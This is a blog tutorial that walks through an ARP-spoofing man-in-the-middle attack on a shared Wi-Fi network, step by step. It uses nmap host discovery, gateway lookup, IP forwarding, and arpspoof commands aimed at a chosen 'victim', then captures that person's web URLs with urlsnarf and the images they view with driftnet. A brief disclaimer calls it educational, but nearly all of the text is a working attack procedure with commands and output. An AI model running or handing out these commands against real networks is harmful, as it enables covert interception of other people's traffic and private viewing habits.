In this article, I will show you how to proceed a man in the middle attack. In a network this attack allows you to re-route the traffic to your computer in order to analyse all the communication. In this example I will use a Linux computer (Lubuntu 16.04 x64) on a wireless network.
Context
This tutorial is made to learn about network and understand its weakness. Don’t use this tutorial to perform a real attack. The gaime.fr website is not responsible of what you can do, and the injure caused.
What do you need ?
- A computer running linux (Lubuntu is used in this example)
- An wifi interface compatible with monitor mode
- Sudo rights on the machine
- Aircrack software
- Nmap software
- Dsniff software
- Driftnet software
- Wireshark software
Step 1: Installing all the software needed
To install the needed software type these commands:
thomas@thomas-linux:~$ sudo apt-get update thomas@thomas-linux:~$ sudo apt-get install wireshark dsniff driftnet
Step 2 : Connect to a network
So from the network manager, connect to a network (could be ethernet or wifi).
From the IP address and mask settings given by the DHCP server, count the number of ‘1’ in the mask to determine the range of IP address of this network.
To get this information follow my example:
thomas@thomas-linux:~$ ifconfig enp5s0 Link encap:Ethernet HWaddr 11:22:33:44:55:66 inet addr:192.168.1.10 Bcast:192.168.1.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:10 errors:0 dropped:0 overruns:0 frame:0 TX packets:10 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:100 (0.0 GB) TX bytes:100 (0.0 GB)
The interesting information is in red.
My settings:
- IP Address: 192.168.1.10 => 1100 0000 1010 1000 0000 0001 0000 1010
- Mask : 255.255.255.0 => 1111 1111 1111 1111 1111 1111 0000 0000
In the mask I have 24 ‘1’ you will see this is use full for the next step.
You note that your network interface in orange is enp5s0. Keep this information we will need it later.
Step 3 : Scan the network to find devices
To scan the network we will use the nmap program. This will send a ping all the IP Adress of the network. If a device have this ip address it will reply by a pong. Nmap will record which of the IP address replied with a pong.
To find the devices on the network follow my example:
thomas@thomas-linux:~$ nmap -sP 192.168.1.10/24 Starting Nmap 7.01 ( https://nmap.org ) at 2017-02-19 15:26 CET Nmap scan report for 192.168.1.1 Host is up (0.00066s latency). Nmap scan report for 192.168.1.10 Host is up (0.000033s latency). Nmap scan report for 192.168.1.55 Host is up (0.0045s latency). Nmap scan report for 192.168.1.100 Host is up (0.00027s latency). Nmap scan report for 192.168.1.101 Host is up (0.00024s latency). Nmap scan report for 192.168.1.104 Host is up (0.0012s latency). Nmap scan report for 192.168.1.106 Host is up (0.0012s latency). Nmap scan report for 192.168.1.107 Host is up (0.0084s latency). Nmap done: 256 IP addresses (8 hosts up) scanned in 2.27 seconds
So let’s explain this command :
- nmap : This is the program use to scan the IP address of the network
- -sP : Tell to nmap that you don’t want to scan all the port of each IP address. This allow to accelerate your network scan
- 192.168.1.10/24 : The first part (192.168.1.10) is my ip address and the second part is (/24) is the number of ‘1’ in the network mask (the one we calculate before)
In red you have all IP address of the devices connected to your network
Step 4 : Find the gateway of the network
The gateway is the point where all the information pass to get outside (on internet for instance). So you need to find the IP address of the gateway.
To find it follow my example:
thomas@Serveur-Linux:~$ route -n Table de routage IP du noyau Destination Passerelle Genmask Indic Metric Ref Use Iface 0.0.0.0 192.168.1.1 0.0.0.0 UG 100 0 0 enp5s0
Let’s explain this command : route -n will read routing table. To find the IP address of the gateway, you should find the line where there is 0.0.0.0 in destination (in yellow). The next value of this line is the IP address of the gateway in this case 192.168.1.1.
Step 5 : Setup your computer to allow packet forwarding
To get all trafic passing through your computer you need to enable the packet forwarding. To do this you need to modify a file in linux
thomas@thomas-linux:~$ sudo nano /proc/sys/net/ipv4/ip_forward
Replace the 0 by 1 easy ^^.
Now the packet can pass through your computer
Step 6 : Launch the attack
First you need to choose a victim, in my case my victim will be 192.168.1.100. In this part we will send packet on the network to tell the victim that you are the gateway. And we will say to the gateway that you are the victim. Normally, when your victim will download a content, it will ask the gateway. As you faked the gateway all the trafic will pass through your computer. In my example the victim is 192.168.1.100 and the gateway is 192.168.1.1. Follow my example:
Open 2 terminals
In one of them type:
thomas@thomas-linux:~$ sudo arpspoof -i enp5s0 -t 192.168.1.100 192.168.1.1
In the second one type :
thomas@thomas-linux:~$ sudo arpspoof -i enp5s0 -t 192.168.1.1 192.168.1.100
You will see things on your terminal, it’s normal, it tell you that the program is sending packet to the network in order to redirect all the trafic on your computer. Keep these 2 commands running until you finish the attack.
Step 7 : Analyse the traffic
Now because you prepare every thing you can start analyzing the traffic.
Analyzing Hypertext content
To analyze the hypertext content type
thomas@thomas-linux:~$ sudo urlsnarf
All the http traffic will appear in the terminal
Analyzing image
To analyze picture that your victim see, type the following command:
thomas@thomas-linux:~$ sudo driftnet
A window will open with the pictures seen by your victim.